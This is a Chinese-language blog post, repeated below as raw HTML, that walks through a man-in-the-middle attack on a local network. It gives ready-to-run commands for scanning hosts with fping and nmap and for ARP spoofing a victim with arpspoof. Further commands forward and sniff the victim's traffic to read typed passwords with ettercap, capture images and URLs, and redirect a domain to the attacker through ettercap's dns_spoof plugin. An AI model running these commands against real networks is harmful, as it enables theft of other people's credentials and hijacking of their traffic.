中间人攻击之dns劫持与ARP欺骗

Author：逍遥子
发布时间：March 10, 2019
10307 views
One comment
1193 words
Categories：全部

arp欺骗

首先连接wifi，进入内网

1，查看内网的存活主机命令
```
fping -asg 192.168.1.0/24
```
也可以用nmap扫描
```
nmap -T4 -A 192.168.1.0/24
```
(视不同环境而定，假设这里的路由器地址为 192.168.1.1)
也可利用其他工具查看其他主机，方法有很多

2，arp欺骗
命令
```
arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1
```
上面一句就对192.168.1.2实施了欺骗，此时该主机是断网的
3，流量转发我们将劫持到的流量通过自己发机器转发到受害人的机器上，让其恢复网络

转发命令

echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1

这时可以启用 wireshark 抓包工具进行抓包
或者直接获取流量包

ettercap -Tq -i wlan0

这样被人输入密码后，我们就可以直接看到。
获取图片和浏览的网站

driftnet -i wlan0
urlsnarf -i wlan0

dns劫持

修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名

开始进行DNS欺骗攻击：

ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//

进行DNS 欺骗后，再次测试：ping www.sina.com.cn ，发现将www.sina.com.cn 解析指向了攻击者主机（192.168.127.208）

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/842.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Kali笔记一键关注

Last modification：March 10, 2019

© Allow specification reprint

正在沿街乞讨中……

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!

Comment *

Private comment

Name *

🎲

Email *

Site

One comment

nigle 中国江苏扬州
September 10th, 2019 at 06:31 pm

请问博主，我在进行dns欺骗的时候会出现这么一行字no scripts were specified, not starting up，然后也没有跳转到我的页面上去，这该怎么解决啊？

Reply

妥当个哈狗
大佬请教一下，我一台普通的pc机，2块1t的硬盘，bios设置...
很无语
请问最后一步怎么修改VUE呀
xxxyyy
抖音那个现在是不是失效了，能下载不能播放，博主有空再验证一下呗
Kevin's Space
我改天试一下，现在我是传到网上的一些平台，倒也快速
Kevin's Space
这动环监控不会是你手搓的吧？大佬！

中间人攻击之dns劫持与ARP欺骗

逍遥子 • 2019 年 03 月 10 日

<h3>arp欺骗</h3><p>首先连接wifi，进入内网<br><div class='handsome_aplayer player-content' data-preload="auto" data-autoplay="false" data-listMaxHeight="340px" data-order="list" data-media="netease" data-id="156374" data-type="song" data-size="large" data-auto="false">
<div class="handsomePlayer-tip-loading"><span></span> <span></span> <span></span> <span></span><span></span></div><div class="handsome_aplayer_music" data-id="156374" data-server="netease" data-type="song" data-auth="5f74914a574350bc69031beda74c1cf8"></div>
</div>
</p><ul><li><p>1，查看内网的存活主机命令</p><pre><code>fping -asg 192.168.1.0/24</code></pre><p>也可以用<code>nmap扫描</code></p><pre><code>nmap -T4 -A 192.168.1.0/24</code></pre><p>(视不同环境而定，假设这里的路由器地址为 <code>192.168.1.1</code>)<br>也可利用其他工具查看其他主机，方法有很多</p></li></ul><ul><li><p>2，arp欺骗  <br>命令</p><pre><code>arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1</code></pre><p>上面一句就对192.168.1.2实施了欺骗 ，此时该主机是断网的</p></li><li>3，流量转发  我们将劫持到的流量通过自己发机器转发到受害人的机器上，让其恢复网络</li></ul><p>转发命令</p><pre><code>echo 1 &gt;/proc/sys/net/ipv4/ip_forward   将参数换为1</code></pre><p>这时可以启用<code> wireshark </code>抓包工具进行抓包<br>或者直接获取流量包</p><pre><code>ettercap -Tq -i wlan0</code></pre><p>这样被人输入密码后，我们就可以直接看到。<br>获取图片和浏览的网站</p><pre><code>driftnet -i wlan0
urlsnarf -i wlan0</code></pre><h3>dns劫持</h3><p>修改<code>/etc/ettercap/etter.dns</code> 添加自己的ip和劫持域名</p><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g0xr65vifrj20k906qgov.jpg" alt="03.png" title="03.png" style=""><br>开始进行DNS欺骗攻击：</p><pre><code>ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//</code></pre><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g0xrh3zy0fj20k70crwln.jpg" alt="as.png" title="as.png" style=""><br>进行DNS 欺骗后，再次测试：<code>ping www.sina.com.cn</code> ，发现将<code>www.sina.com.cn</code> 解析指向了攻击者主机（<code>192.168.127.208</code>）</p><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g0xrc5i8hlj20kc08b791.jpg" alt="01.png" title="01.png" style=""></p><hr class="content-copyright" style="margin-top:50px" /><div class="post-copyright" style="font-style:normal"> <p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：<a class="content-copyright" href="https://blog.bbskali.cn/842.html">https://blog.bbskali.cn/842.html</a></p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>